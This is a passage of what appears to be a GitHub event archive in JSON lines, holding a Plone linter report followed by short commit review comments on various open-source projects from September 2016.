quotes.\nplone/app/discussion/tests/test_tool.py:43:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_tool.py:43:15: S001 found %s formatter\nplone/app/discussion/tests/test_workflow.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_workflow.py:58:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:94:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_workflow.py:133:38: S001 found %s formatter\nplone/app/discussion/tests/test_workflow.py:153:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:154:9: E265 block comment should start with '# '\nplone/app/discussion/tests/test_workflow.py:203:38: S001 found %s formatter\nplone/app/discussion/browser/captcha.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/captcha.py:64:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/comment.py:45:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:45:20: S001 found %s formatter\nplone/app/discussion/browser/comment.py:47:41: S001 found %s formatter\nplone/app/discussion/browser/comment.py:53:10: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:92:52: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:95:40: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:95:58: Q000 Remove bad quotes.\nplone/app/discussion/browser/comment.py:108:1: E265 block comment should start with '# '\nplone/app/discussion/browser/comments.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/comments.py:94:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:100:35: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:128:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:129:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:130:42: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:132:1: C901 'CommentForm.handleComment' is too complex (15)\nplone/app/discussion/browser/comments.py:141:32: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:142:32: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:157:16: E713 test for membership should be 'not in'\nplone/app/discussion/browser/comments.py:210:53: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:251:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:252:22: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:275:13: W503 line break before binary operator\nplone/app/discussion/browser/comments.py:276:13: W503 line break before binary operator\nplone/app/discussion/browser/comments.py:325:39: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:328:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:336:41: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:344:37: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:415:20: Q000 Remove bad quotes.\nplone/app/discussion/browser/comments.py:415:21: S001 found %s formatter\nplone/app/discussion/browser/comments.py:462:17: S001 found %s formatter\nplone/app/discussion/browser/controlpanel.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/controlpanel.py:34:10: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:90:55: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:91:48: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:96:55: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:97:40: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:97:41: S001 found %s formatter\nplone/app/discussion/browser/controlpanel.py:113:46: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:119:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:126:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:128:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:131:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:135:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:141:27: Q000 Remove bad quotes.\nplone/app/discussion/browser/controlpanel.py:168:46: Q000 Remove bad quotes.\nplone/app/discussion/browser/conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/conversation.py:20:1: B901 blind except: statement\nplone/app/discussion/browser/conversation.py:32:1: C901 'ConversationView._enabled_for_archetypes' is too complex (14)\nplone/app/discussion/browser/conversation.py:138:12: P002 found \"hasattr\", consider replacing it\nplone/app/discussion/browser/conversation.py:138:29: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/migration.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/migration.py:37:1: C901 'View.__call__' is too complex (32)\nplone/app/discussion/browser/migration.py:44:19: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:48:16: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:80:26: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:82:31: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:83:22: S001 found %s formatter\nplone/app/discussion/browser/migration.py:181:25: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:181:26: S001 found %s formatter\nplone/app/discussion/browser/migration.py:191:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:191:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:205:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:205:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:206:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:206:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:207:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:207:20: S001 found %s formatter\nplone/app/discussion/browser/migration.py:209:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:210:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:228:21: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:229:31: S001 found %s formatter\nplone/app/discussion/browser/migration.py:237:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:238:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:239:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:239:28: S001 found %s formatter\nplone/app/discussion/browser/migration.py:246:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:248:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:249:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:250:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:252:13: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:253:13: S001 found % formatter\nplone/app/discussion/browser/migration.py:257:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:257:18: S001 found %s formatter\nplone/app/discussion/browser/migration.py:261:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:262:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:266:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/migration.py:267:17: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/moderation.py:100:15: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:101:18: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:141:15: Q000 Remove bad quotes.\nplone/app/discussion/browser/moderation.py:142:18: Q000 Remove bad quotes.\nplone/app/discussion/browser/traversal.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/browser/traversal.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/browser/traversal.py:32:20: Q000 Remove bad quotes.\nplone/app/discussion/browser/validator.py:0:1: I001 isort found changes, run it on the file\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-20T13:57:14Z"}
{"id":"4589815806","type":"CommitCommentEvent","actor":{"login":"dorugeber"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19096554,"position":15,"line":114,"path":"firedrake/solving_utils.py","commit_id":"6c89d8171ebbd696be7193f0e99a709bfe7846a0","created_at":"2016-09-20T13:57:44Z","updated_at":"2016-09-20T13:57:44Z","body":"NL and L fails should be different exceptions, surely?  (Unless you want the user to parse the error message...)"}},"created_at":"2016-09-20T13:57:44Z"}
{"id":"4589816840","type":"CommitCommentEvent","actor":{"login":"LogicalDash"},"repo":{"name":"LogicalDash/LiSE"},"payload":{"comment":{"id":19096555,"position":null,"line":null,"path":null,"commit_id":"5220d4750f1647c0468f07fcea1a49de5384443d","created_at":"2016-09-20T13:57:53Z","updated_at":"2016-09-20T13:57:53Z","body":"Seems to've fixed #15 "}},"created_at":"2016-09-20T13:57:53Z"}
{"id":"4589820176","type":"CommitCommentEvent","actor":{"login":"slluis"},"repo":{"name":"mono/monodevelop"},"payload":{"comment":{"id":19096558,"position":null,"line":null,"path":null,"commit_id":"5e7c6616171106867f7fdf52ef1526e0c3dcb6e6","created_at":"2016-09-20T13:58:22Z","updated_at":"2016-09-20T13:58:22Z","body":"You can't leave this as is. Please either revert the change or fix the bug in a different way."}},"created_at":"2016-09-20T13:58:22Z"}
{"id":"4589821197","type":"CommitCommentEvent","actor":{"login":"OwaisAhmadJan"},"repo":{"name":"kamailio/kamailio"},"payload":{"comment":{"id":19096560,"position":null,"line":null,"path":null,"commit_id":"e65e84caa0e89d8955b44c1ecb8628486ae83e76","created_at":"2016-09-20T13:58:31Z","updated_at":"2016-09-20T13:58:31Z","body":"Great, that works!"}},"created_at":"2016-09-20T13:58:31Z"}
{"id":"4589821684","type":"CommitCommentEvent","actor":{"login":"stevepeak"},"repo":{"name":"tierratelematics/tierra_qa"},"payload":{"comment":{"id":19096561,"position":null,"line":null,"path":null,"commit_id":"d816585dd78cdf37e5b4c134f8fd5b1cb85fb40c","created_at":"2016-09-20T13:58:35Z","updated_at":"2016-09-20T13:58:35Z","body":"```diff\r\n-commands={[testenv:phantomjs]commands} --cov=tierra_qa\r\n+commands=\r\n+    {[testenv:phantomjs]commands} --cov=tierra_qa\r\n+    coverage xml"}},"created_at":"2016-09-20T13:58:35Z"}
{"id":"4589824586","type":"CommitCommentEvent","actor":{"login":"Salonen"},"repo":{"name":"Salonen/IIO11300"},"payload":{"comment":{"id":19096563,"position":2,"line":2,"path":"README.md","commit_id":"0ee50bc640c6f2de9dba22d100847710baeaf215","created_at":"2016-09-20T13:59:04Z","updated_at":"2016-09-20T13:59:04Z","body":"Tehtava2 on nyt Tehtava3."}},"created_at":"2016-09-20T13:59:04Z"}
{"id":"4589825188","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096564,"position":27,"line":1263,"path":"src/common/config/session-config.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T13:59:10Z","updated_at":"2016-09-20T13:59:10Z","body":"setting those to NULL is redundant: they are already NULL. Perhaps put a comment instead explaining why they need to stay NULL ?"}},"created_at":"2016-09-20T13:59:10Z"}
{"id":"4589826744","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096567,"position":32,"line":1268,"path":"src/common/config/session-config.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T13:59:22Z","updated_at":"2016-09-20T13:59:22Z","body":"same"}},"created_at":"2016-09-20T13:59:22Z"}
{"id":"4589827251","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096569,"position":36,"line":1272,"path":"src/common/config/session-config.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T13:59:27Z","updated_at":"2016-09-20T13:59:27Z","body":"same"}},"created_at":"2016-09-20T13:59:27Z"}
{"id":"4589832674","type":"CommitCommentEvent","actor":{"login":"Delapouite"},"repo":{"name":"medialab/hyphe-browser"},"payload":{"comment":{"id":19096584,"position":5,"line":88,"path":"app/components/browser/BrowserTab.js","commit_id":"64f1941a5dc1b968576f0dcb310f8ff63ae06661","created_at":"2016-09-20T14:00:16Z","updated_at":"2016-09-20T14:00:16Z","body":"les navigateurs font malheuresement toujours un GET implicite vers /favicon.ico meme sans déclaration dans la source. http://stackoverflow.com/questions/1321878/how-to-prevent-favicon-ico-requests"}},"created_at":"2016-09-20T14:00:16Z"}
{"id":"4589834234","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096587,"position":105,"line":1380,"path":"src/common/config/session-config.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T14:00:29Z","updated_at":"2016-09-20T14:00:29Z","body":"same around here about NULL"}},"created_at":"2016-09-20T14:00:29Z"}
{"id":"4589836191","type":"CommitCommentEvent","actor":{"login":"RKushnir"},"repo":{"name":"ad2games/ad2games-theme"},"payload":{"comment":{"id":19096591,"position":5,"line":6,"path":"ad2games-theme.gemspec","commit_id":"de08d5bef03e6e42dfbf73e3728c90e93ed741cf","created_at":"2016-09-20T14:00:47Z","updated_at":"2016-09-20T14:00:47Z","body":"It seems, this version has been incremented with javascript (`version + 1`) 😄 "}},"created_at":"2016-09-20T14:00:47Z"}
{"id":"4589839086","type":"CommitCommentEvent","actor":{"login":"ralphboeije"},"repo":{"name":"part-up/part-up"},"payload":{"comment":{"id":19096600,"position":null,"line":null,"path":null,"commit_id":"4606fc3310aec3b8ab08a581f2b15cb3f8cdc33d","created_at":"2016-09-20T14:01:11Z","updated_at":"2016-09-20T14:01:11Z","body":"@prik wasn't the issue that the getAmountOfColumns.Partup.client.screen.size.get('width') is missing?"}},"created_at":"2016-09-20T14:01:11Z"}
{"id":"4589841262","type":"CommitCommentEvent","actor":{"login":"volaya"},"repo":{"name":"boundlessgeo/qgis-plugin-template"},"payload":{"comment":{"id":19096612,"position":33,"line":33,"path":"pavement.py","commit_id":"712640bb86f66b3d7be287863e54e4d8651f0633","created_at":"2016-09-20T14:01:31Z","updated_at":"2016-09-20T14:01:31Z","body":"good catch. That has actually never been used much... I will remove it"}},"created_at":"2016-09-20T14:01:31Z"}
{"id":"4589841963","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096614,"position":62,"line":234,"path":"src/lib/lttng-ctl/load.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T14:01:37Z","updated_at":"2016-09-20T14:01:37Z","body":"missing zmalloc failure handling."}},"created_at":"2016-09-20T14:01:37Z"}
{"id":"4589845246","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096621,"position":89,"line":314,"path":"src/lib/lttng-ctl/load.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T14:02:08Z","updated_at":"2016-09-20T14:02:08Z","body":"missing failure handling."}},"created_at":"2016-09-20T14:02:08Z"}
{"id":"4589846148","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096622,"position":116,"line":396,"path":"src/lib/lttng-ctl/load.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T14:02:16Z","updated_at":"2016-09-20T14:02:16Z","body":"missing failure handling."}},"created_at":"2016-09-20T14:02:16Z"}
{"id":"4589846896","type":"CommitCommentEvent","actor":{"login":"X-Ryl669"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19096623,"position":null,"line":null,"path":null,"commit_id":"81b738f4ec9bc7abaeec10e25fb82b4721d19087","created_at":"2016-09-20T14:02:23Z","updated_at":"2016-09-20T14:02:23Z","body":"To explain why I did it this way, let's break it down in steps.\r\n\r\n1. Without anything attached to ESP, except a UART, I observed that the initial code did not sleep as expected. (In fact, it rebooted due to software watchdog, and when disabled explicitely, due to hardware watchdog). There was no explanation why it failed, and I realized that \"system_deep_sleep()\" must be called in a callback from the OS to work. That might explain the low battery life you observed.\r\n2. I could not get SPI to work reliably (that is, only with MOSI / SCK, it does not work at all at good speed, and with the CS lines connected, it will still miss one byte once in a while). When the ESP triggers the screen at regular interval, it's not a **big** issue, since the next run will fix this, but once you have deep sleep working, you could end up with a corrupted screen for ~ one hour (which is bad).\r\nI wonder if I used DMA on the STM32 it would have worked better, but at the same time, I had one of the small wires unsoldered, and I gave up with SPI.\r\n3. Then, I did the UART version, realized it was much much easier (soldering is on a big pin, you have everything ready on the big connector) and much more reliable. I did not get any failure in the random byte tests I run for many minutes. \r\n4. However, when getting deep_sleep to work, I realized ESP generate some noise on the UART / SPI lines while booting. For UART, this leads up to one or more bullshit bytes being read on the STM32. With SPI, it's even worse, because the first byte tells the STM32 what to do (so if it's random, well...).\r\nI don't know how you prevented the \"noise on the power transistor pin\" while the ESP was booting, but I failed to do so, so I removed the power gating transistor. Instead, I plugged the ESP GPIO to the reset line on the STM32.\r\n5. In the end, when the ESP wakes up, it hold the RESET line of the STM32 (low consumption), until it boots, and then send the magic bytes on the UART line. The STM32 just consumes bytes on the UART line untils it finds the magic bytes. Then it waits for a command and/or screen.\r\nThe ESP sends the screen while receiving it (it also gets from the server the next amount of time to sleep), and when done, the STM32 enters low power mode.\r\nThe ESP waits a bit (it does not have any feedback from the STM32, so it's plain timer, like you did), then it puts the STM32 in RESET and goes to deep sleep for the server's specified amount of time.\r\n6. With this scheme, power consumption is probably not as low as your solution with a power gating transistor, but it's quite small on average. Because of the deepsleep bug in the initial code, I wonder if my solution is not better in the end. \r\n"}},"created_at":"2016-09-20T14:02:23Z"}
{"id":"4589847082","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096625,"position":142,"line":484,"path":"src/lib/lttng-ctl/load.c","commit_id":"a46fe559837e48ddb352cda90108bcd0611e53ea","created_at":"2016-09-20T14:02:24Z","updated_at":"2016-09-20T14:02:24Z","body":"missing failure handling."}},"created_at":"2016-09-20T14:02:24Z"}
{"id":"4589851569","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19096632,"position":6,"line":18,"path":"language/en.xml","commit_id":"983f487d99edba64a8cb2fb41731473074d6e1ff","created_at":"2016-09-20T14:02:55Z","updated_at":"2016-09-20T14:02:55Z","body":"Typo"}},"created_at":"2016-09-20T14:02:55Z"}
{"id":"4589853980","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19096637,"position":10,"line":20,"path":"files/lib/data/language/LanguageCache.class.php","commit_id":"16fbaf17a56693f586b6d08d94b8e10e50d69c37","created_at":"2016-09-20T14:03:16Z","updated_at":"2016-09-20T14:03:16Z","body":"typo"}},"created_at":"2016-09-20T14:03:16Z"}
{"id":"4589854144","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096638,"position":17,"line":61,"path":"doc/man/lttng-load.1.txt","commit_id":"0e822c1f2fd42e39af421670f69c681019a3e3d8","created_at":"2016-09-20T14:03:18Z","updated_at":"2016-09-20T14:03:18Z","body":"options -> option"}},"created_at":"2016-09-20T14:03:18Z"}
{"id":"4589856685","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096642,"position":31,"line":86,"path":"doc/man/lttng-load.1.txt","commit_id":"0e822c1f2fd42e39af421670f69c681019a3e3d8","created_at":"2016-09-20T14:03:42Z","updated_at":"2016-09-20T14:03:42Z","body":"during load  ?"}},"created_at":"2016-09-20T14:03:42Z"}
{"id":"4589857405","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096644,"position":31,"line":86,"path":"doc/man/lttng-load.1.txt","commit_id":"0e822c1f2fd42e39af421670f69c681019a3e3d8","created_at":"2016-09-20T14:03:49Z","updated_at":"2016-09-20T14:03:49Z","body":"while loading ?"}},"created_at":"2016-09-20T14:03:49Z"}
{"id":"4589857560","type":"CommitCommentEvent","actor":{"login":"wakaleo"},"repo":{"name":"serenity-dojo/vet-clinic"},"payload":{"comment":{"id":19096645,"position":null,"line":null,"path":null,"commit_id":"358db26704b9095982131bc64c4bc8521a6e08f3","created_at":"2016-09-20T14:03:51Z","updated_at":"2016-09-20T14:03:51Z","body":"Great stuff Kiran!"}},"created_at":"2016-09-20T14:03:51Z"}
{"id":"4589858746","type":"CommitCommentEvent","actor":{"login":"rad8329"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19096647,"position":42,"line":480,"path":"framework/web/View.php","commit_id":"fd6dd73cec3e7a35855c9d088f839581a9e09ace","created_at":"2016-09-20T14:04:00Z","updated_at":"2016-09-20T14:04:00Z","body":"0k, but it does't work when the baseUrl is different of `@web`,  it assumes that it will always be `@web`. For example my AssetBundle looks like:\r\n`   public $basePath = '@cdn'; `\r\n `  public $baseUrl = '@cdnweb';`\r\n\r\nThis happens also in `registerCssFile`\r\n![captura de pantalla de 2016-09-20 09-03-19](https://cloud.githubusercontent.com/assets/5356143/18673361/27dbfed0-7f11-11e6-886e-e85338a0b000.png)\r\n\r\n"}},"created_at":"2016-09-20T14:04:00Z"}
{"id":"4589859352","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19096649,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T14:04:07Z","updated_at":"2016-09-20T14:04:07Z","body":"No. I believe that's a really bad idea. Please wait untill I'll implement another two algorirhms from [Astronomy Answers](http://aa.quae.nl/en/reken/juliaansedag.html).\r\n\r\nMoreover, I see no big difference between perfomance of `jd_to_gregorian2`/`gregorian_to_jd2` and `jd_to_gregorian3`/`gregorian_to_jd3`.\r\n\r\nAre `jd_to_gregorian2` and `gregorian_to_jd2` (**Gregorian only**, Wikipedia-based) functions irreversible? I'm asking about conversions to/from Gregorian calendar only. Did we check them?"}},"created_at":"2016-09-20T14:04:07Z"}
{"id":"4589860223","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096651,"position":25,"line":242,"path":"src/bin/lttng/commands/load.c","commit_id":"0e822c1f2fd42e39af421670f69c681019a3e3d8","created_at":"2016-09-20T14:04:15Z","updated_at":"2016-09-20T14:04:15Z","body":"overrides -> override"}},"created_at":"2016-09-20T14:04:15Z"}
{"id":"4589862775","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19096656,"position":28,"line":29,"path":"files/lib/data/language/item/value/LanguageItemValue.class.php","commit_id":"f6826d608bfa76ba592dffb7847ea8e4662ae387","created_at":"2016-09-20T14:04:40Z","updated_at":"2016-09-20T14:04:40Z","body":"`$excludes = $statement->fetchAll(\\PDO::FETCH_COLUMN)`"}},"created_at":"2016-09-20T14:04:40Z"}
{"id":"4589864578","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"medialab/hyphe-browser"},"payload":{"comment":{"id":19096661,"position":5,"line":88,"path":"app/components/browser/BrowserTab.js","commit_id":"64f1941a5dc1b968576f0dcb310f8ff63ae06661","created_at":"2016-09-20T14:04:56Z","updated_at":"2016-09-20T14:04:56Z","body":"pas la main sur ce serveur et aucune idée de pourquoi il 200 à ça, bluffé là... je pinge notre adminsys!"}},"created_at":"2016-09-20T14:04:56Z"}
{"id":"4589865922","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19096664,"position":42,"line":480,"path":"framework/web/View.php","commit_id":"fd6dd73cec3e7a35855c9d088f839581a9e09ace","created_at":"2016-09-20T14:05:09Z","updated_at":"2016-09-20T14:05:09Z","body":"Please, create a separate issue for this problem"}},"created_at":"2016-09-20T14:05:09Z"}
{"id":"4589867214","type":"CommitCommentEvent","actor":{"login":"drinkingChai"},"repo":{"name":"drinkingChai/angular-project-3"},"payload":{"comment":{"id":19096667,"position":5,"line":18,"path":"app/assets/templates/notes/edit.html","commit_id":"aaa6f0a158444d93095f0ad1e315186fa84dd4a4","created_at":"2016-09-20T14:05:21Z","updated_at":"2016-09-20T14:05:21Z","body":"Gah!!! Thanks a bunch! I was using the Atom snippets so just typing in form and letting it the HTML autofill. Thank you! I promise CodeSchool's design courses are on my to-learn list!"}},"created_at":"2016-09-20T14:05:21Z"}
{"id":"4589869813","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19096670,"position":null,"line":null,"path":null,"commit_id":"c64e8f944e471776d7cd242a6843d752e103f240","created_at":"2016-09-20T14:05:45Z","updated_at":"2016-09-20T14:05:45Z","body":"On the series, Very good jobs.\r\n\r\nBy the way, I wanted to ask you, is it possible to filter the warning in 3rdparty code ? I'm not sure it is useful to see the warning of wx in the appveyor console. Or do you feel it is a bad idea."}},"created_at":"2016-09-20T14:05:45Z"}
{"id":"4589869927","type":"CommitCommentEvent","actor":{"login":"ctoroman"},"repo":{"name":"residualvm/residualvm"},"payload":{"comment":{"id":19096671,"position":null,"line":null,"path":null,"commit_id":"1a8773f3ab3217430a5bc038db1f436f28002019","created_at":"2016-09-20T14:05:46Z","updated_at":"2016-09-20T14:05:46Z","body":"It works! Thank you very, very much !!! :)"}},"created_at":"2016-09-20T14:05:46Z"}
{"id":"4589871488","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19096673,"position":null,"line":null,"path":null,"commit_id":"2016a50d3ddad734e26b085fb25be39c157f31f1","created_at":"2016-09-20T14:06:00Z","updated_at":"2016-09-20T14:06:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1071](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13643&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 242, ignored: 3 Build time: 00:10:25"}},"created_at":"2016-09-20T14:06:00Z"}
{"id":"4589872814","type":"CommitCommentEvent","actor":{"login":"aNNiMON"},"repo":{"name":"aNNiMON/Own-Programming-Language-Tutorial"},"payload":{"comment":{"id":19096678,"position":26,"line":26,"path":"src/com/annimon/ownlang/parser/ast/BinaryExpression.java","commit_id":"a1c16e9d42f16cb9e3828ea93bd4cd67cf06a7eb","created_at":"2016-09-20T14:06:13Z","updated_at":"2016-09-20T14:06:13Z","body":"Потому что там кроме этих операций ничего нет, а заморачивать Enum'ами не хотел. Сейчас там Enum."}},"created_at":"2016-09-20T14:06:13Z"}
{"id":"4589873952","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":19096681,"position":38,"line":38,"path":"files/lib/data/I18nDatabaseObjectList.class.php","commit_id":"eccea75648920234c702c155688cec7a0d4c6372","created_at":"2016-09-20T14:06:23Z","updated_at":"2016-09-20T14:06:23Z","body":"All these can be reduced to the second case (`count($tmp) > 2`)."}},"created_at":"2016-09-20T14:06:23Z"}
{"id":"4589877125","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":19096686,"position":null,"line":null,"path":null,"commit_id":"7e0329836caf7874de191c27aa3cb37b2a419216","created_at":"2016-09-20T14:06:54Z","updated_at":"2016-09-20T14:06:54Z","body":"Making a bot to hit an enemy is not as easy as it sounds. Without these addition they were barely able to hit EB on long range, and that was noticeable in bomb testing."}},"created_at":"2016-09-20T14:06:54Z"}
{"id":"4589877675","type":"CommitCommentEvent","actor":{"login":"SevInf"},"repo":{"name":"gemini-testing/gemini"},"payload":{"comment":{"id":19096689,"position":null,"line":null,"path":null,"commit_id":"3eae59032adefcacb23a45a38222a33517ba54e4","created_at":"2016-09-20T14:06:59Z","updated_at":"2016-09-20T14:06:59Z","body":"Ну про клонирование в пулл реквесте вполне себе хорошее описание было, чем именно это полезно."}},"created_at":"2016-09-20T14:06:59Z"}
{"id":"4589878323","type":"CommitCommentEvent","actor":{"login":"compudj"},"repo":{"name":"PSRCode/lttng-tools"},"payload":{"comment":{"id":19096692,"position":null,"line":null,"path":null,"commit_id":"0e822c1f2fd42e39af421670f69c681019a3e3d8","created_at":"2016-09-20T14:07:04Z","updated_at":"2016-09-20T14:07:04Z","body":"we may also want to implement --override-ctrl-url and --override-data-url for completeness."}},"created_at":"2016-09-20T14:07:04Z"}
